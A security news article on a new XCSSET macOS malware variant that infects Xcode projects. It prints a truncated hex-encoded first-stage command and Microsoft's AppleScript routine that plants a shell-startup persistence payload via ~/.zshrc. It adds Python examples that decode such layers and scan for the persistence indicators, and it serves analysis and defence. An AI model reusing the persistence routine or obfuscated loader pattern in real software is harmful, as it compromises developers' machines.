New XCSSET Malware Attacking macOS Users With Enhanced Obfuscation


Mar 12, 2025 - 09:05

Microsoft Threat Intelligence has discovered a new variant of XCSSET, a sophisticated modular macOS malware that infects Xcode projects and executes when developers build these projects.

This is the first known XCSSET variant since 2022, featuring enhanced obfuscation methods, updated persistence mechanisms, and new infection strategies designed to steal sensitive information from macOS users.

The infection strategy relies on the way developers working on Apple and macOS applications share Xcode project files: an infected project carries the payload to anyone who builds it.

XCSSET’s new variant employs a modular approach with heavily encoded payloads and improved error handling.

It makes extensive use of scripting languages, UNIX commands, and legitimate binaries to maintain a low profile on affected devices and remain fileless whenever possible, making detection and removal challenging.

At the code level, the malware obfuscates module names to hinder static analysis and employs a randomized approach for generating payloads.

While previous variants relied solely on xxd (hexdump) for encoding, the latest one also incorporates Base64 encoding techniques.

The malware utilizes three distinct persistence techniques, ensuring its payload launches whenever a new shell session begins, a user opens a fake Launchpad application, or a developer commits changes in Git.

Microsoft researchers noted that the infection chain consists of four stages, beginning with an obfuscated shell payload that runs when building an infected Xcode project.

Obfuscated first-stage shell payload (Source – Microsoft)

This first-stage payload is passed through multiple iterations of a hex decoder before being piped to a shell. The beginning of the command, as it appears in Microsoft's screenshot (the fragment is truncated here), is:-

sh -c"(echo  33336363233343633335233303536
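As an added illustration (not code from Microsoft's report or from the malware), the following Python builds a benign command wrapped in nested echo-hex-to-xxd and echo-base64-to-base64-decode layers, the two encodings the article attributes to XCSSET, and then unwraps them statically, decoding each layer without executing any of it. The sample payload and the regexes are assumptions constructed for this example; the decoder refuses odd-length hex, which is what a truncated screenshot fragment looks like, rather than guessing at it.

```python
import base64
import binascii
import re

# Constructed sample (added example, not the real XCSSET payload): a benign
# command wrapped in the two encodings the article attributes to the malware.
def hex_wrap(cmd):
    """Wrap cmd the way an xxd -p encoded stage is run: echo <hex> | xxd -p -r | sh."""
    return f"echo {cmd.encode().hex()} | xxd -p -r | sh"

def b64_wrap(cmd):
    """Wrap cmd as a base64 stage: echo <b64> | base64 -d | sh."""
    return f"echo {base64.b64encode(cmd.encode()).decode()} | base64 -d | sh"

INNER = "echo constructed-benign-payload"
SAMPLE = hex_wrap(hex_wrap(b64_wrap(hex_wrap(INNER))))   # four nested layers

# `echo <data> | <decoder>`: the decoder that follows tells us which encoding it is.
HEX_LAYER = re.compile(r"echo\s+([0-9a-fA-F]+)\s*\|\s*xxd\s+(?:-p\s+-r|-r\s+-p|-rp|-pr)\b")
B64_LAYER = re.compile(r"echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+(?:-d|-D|--decode)\b")

def decode_layer(stage):
    """Decode one encoding layer statically, or return None if there is none.
    Odd-length hex (a truncated fragment) is refused rather than guessed at."""
    m = HEX_LAYER.search(stage)
    if m:
        data = m.group(1)
        if len(data) % 2:
            return None
        return bytes.fromhex(data).decode("utf-8", errors="replace")
    m = B64_LAYER.search(stage)
    if m:
        try:
            return base64.b64decode(m.group(1), validate=True).decode("utf-8", errors="replace")
        except binascii.Error:
            return None
    return None

def peel(stage, max_layers=32):
    """Unwrap every layer without executing any of them; innermost command last."""
    layers = [stage]
    while len(layers) <= max_layers:
        inner = decode_layer(layers[-1])
        if inner is None:
            break
        layers.append(inner)
    return layers

if __name__ == "__main__":
    for depth, layer in enumerate(peel(SAMPLE)):
        print(f"layer {depth}: {layer[:70]}{'...' if len(layer) > 70 else ''}")
```

Because each layer is identified by the decoder that follows the echo (xxd versus base64), a hex string that happens to be valid base64 is never misread, and the loop stops on the first layer it cannot decode, so a real first stage captured from a build log can be unwrapped to its plaintext command for triage without ever running it.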

Following initial infection, the malware downloads additional modules from its command-and-control (C2) server, including components that steal system information, browser extension data, digital wallet information, and notes from the Notes application.

Persistence Techniques

The malware establishes persistence through several sophisticated methods. One approach modifies the ~/.zshrc file to execute malicious code whenever a new shell session starts.

zshrc persistence method (Source – Microsoft)

The zshrc persistence routine first checks a restore flag: if it is set, the malicious aliases file is removed; otherwise the payload is written to ~/.zshrc_aliases and a line that sources that file is appended to ~/.zshrc, so the payload runs in every new shell session (the grep guard keeps the line from being added twice):-

-- Reproduced from Microsoft's analysis. RESTORE_DEFAULT and getPayloadBody()
-- are defined elsewhere in the module and are not shown here.
on doMain()
    try
        if RESTORE_DEFAULT is true then
            -- clean-up path: remove the dropped aliases file
            do shell script "rm -f ~/.zshrc_aliases"
            log ".zshrc_aliases removed"
        else
            -- write the "Terminal" payload into a hidden aliases file
            set payload to getPayloadBody("Terminal")
            set payload to quoted form of payload
            do shell script "echo " & payload & " > ~/.zshrc_aliases"
            log ".zshrc_aliases updated"
            -- make every new zsh session source that file; grep -qF keeps the
            -- line from being appended more than once
            set payload to "[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases"
            set payload to quoted form of payload
            do shell script "touch ~/.zshrc"
            do shell script "grep -qF '.zshrc_aliases' ~/.zshrc || echo " & payload & " >> ~/.zshrc"
            log ".zshrc done"
        end if
    on error the errorMessage
        log "failed at .zshrc: " & errorMessage
        return
    end try
end doMain

Another persistence technique involves creating a fake Launchpad application that executes malicious code whenever a user attempts to open the legitimate Launchpad.

The malware also infects Git repositories by modifying pre-commit hooks to execute its payload whenever developers commit changes.
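The shell-startup and Git-hook persistence described above, together with the infected-project build phase that starts the chain, can be checked from one script. The following Python is an added example, not Microsoft's detection logic and not anything from the malware: it constructs a throwaway home directory containing the three indicators (plus one clean repository), then scans it, flagging only scripts that decode hex or base64 and pipe the result into a shell. The file names, the sample payload and the indicator regexes are assumptions made for this example; the fake Launchpad technique is not covered because the article gives no file details for it. Point scan_home at a real home directory to use it for triage.

```python
import re
import stat
import tempfile
from pathlib import Path

# Added example (not Microsoft's or the malware's code). Indicator logic follows
# the article: a shell rc file that sources a hidden aliases file, a Git
# pre-commit hook, and an Xcode "Run Script" build phase, each of which feeds
# hex/base64 to a decoder and pipes the result into a shell.
DECODE_AND_RUN = re.compile(
    r"\|\s*(?:xxd\s+(?:-p\s+-r|-r\s+-p|-rp|-pr)|base64\s+(?:-d|-D|--decode))\b"
    r".*\|\s*(?:/bin/)?(?:ba|z)?sh\b", re.S)
# `. file` / `source file`, also after `&&`, `;` or `||` as in the article's zshrc line.
SOURCED = re.compile(r"(?:^|[;&|]\s*)(?:\.|source)\s+([^\s;&|]+)", re.M)
# Real project.pbxproj syntax: shellScript = "..."; inside a PBXShellScriptBuildPhase.
PBX_SCRIPT = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"')

def decodes_and_runs(text):
    """True if the script decodes hex/base64 and pipes the result to a shell."""
    return bool(DECODE_AND_RUN.search(text))

def _resolve(token, home):
    """Expand $HOME / ~ in a sourced path relative to the home being scanned."""
    token = token.strip("'\"").replace("${HOME}", str(home)).replace("$HOME", str(home))
    return Path(str(home) + token[1:]) if token.startswith("~") else Path(token)

def scan_home(home):
    """Return (indicator, path) pairs for the three persistence/infection spots."""
    home = Path(home)
    hits = []
    for rc in (".zshrc", ".zprofile", ".bash_profile", ".bashrc"):
        rc_path = home / rc
        if not rc_path.is_file():
            continue
        for m in SOURCED.finditer(rc_path.read_text(errors="replace")):
            target = _resolve(m.group(1), home)
            if target.is_file() and decodes_and_runs(target.read_text(errors="replace")):
                hits.append(("rc-sourced-file", target))
    for path in home.rglob("*"):
        if path.name == "pre-commit" and path.parent.name == "hooks" \
                and path.parent.parent.name == ".git":
            # Git only runs the hook if it is executable.
            executable = path.stat().st_mode & stat.S_IXUSR
            if executable and decodes_and_runs(path.read_text(errors="replace")):
                hits.append(("git-pre-commit-hook", path))
        elif path.name == "project.pbxproj":
            for m in PBX_SCRIPT.finditer(path.read_text(errors="replace")):
                script = m.group(1).replace('\\"', '"').replace("\\n", "\n")
                if decodes_and_runs(script):
                    hits.append(("xcode-build-phase", path))
    return hits

# Constructed sample tree (assumed names; the payload decodes to a harmless echo).
BENIGN = "echo constructed-benign-payload"
STAGE = f"echo {BENIGN.encode().hex()} | xxd -p -r | sh"

def build_sample_home():
    """Create a throwaway home directory with the three indicators plus a clean repo."""
    home = Path(tempfile.mkdtemp(prefix="xcsset-demo-"))
    (home / ".zshrc_aliases").write_text(STAGE + "\n")
    (home / ".zshrc").write_text(
        "export PATH=$HOME/bin:$PATH\n"
        "[ -f $HOME/.zshrc_aliases ] && . $HOME/.zshrc_aliases\n")
    hooks = home / "infected" / ".git" / "hooks"
    hooks.mkdir(parents=True)
    hook = hooks / "pre-commit"
    hook.write_text("#!/bin/sh\n" + STAGE + "\n")
    hook.chmod(hook.stat().st_mode | stat.S_IXUSR)
    xcodeproj = home / "infected" / "App.xcodeproj"
    xcodeproj.mkdir()
    pbx_script = STAGE.replace('"', '\\"') + "\\n"
    (xcodeproj / "project.pbxproj").write_text(
        "/* Begin PBXShellScriptBuildPhase section */\n"
        f'\t\tshellScript = "{pbx_script}";\n'
        "/* End PBXShellScriptBuildPhase section */\n")
    clean = home / "clean" / ".git" / "hooks"
    clean.mkdir(parents=True)
    (clean / "pre-commit.sample").write_text("#!/bin/sh\nexit 0\n")
    return home

if __name__ == "__main__":
    for kind, path in scan_home(build_sample_home()):
        print(f"{kind:22} {path}")
```

The scanner deliberately keys on the decode-then-execute pipeline rather than on specific file names, since the article notes the malware randomises and re-encodes its payloads; a hook or rc file that merely sets aliases is not reported.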

Microsoft recommends that users run the latest operating system versions, carefully inspect Xcode projects, and utilize security solutions like Microsoft Defender for Endpoint on Mac, which can detect and quarantine the malware variants.


The post New XCSSET Malware Attacking macOS Users With Enhanced Obfuscation appeared first on Cyber Security News.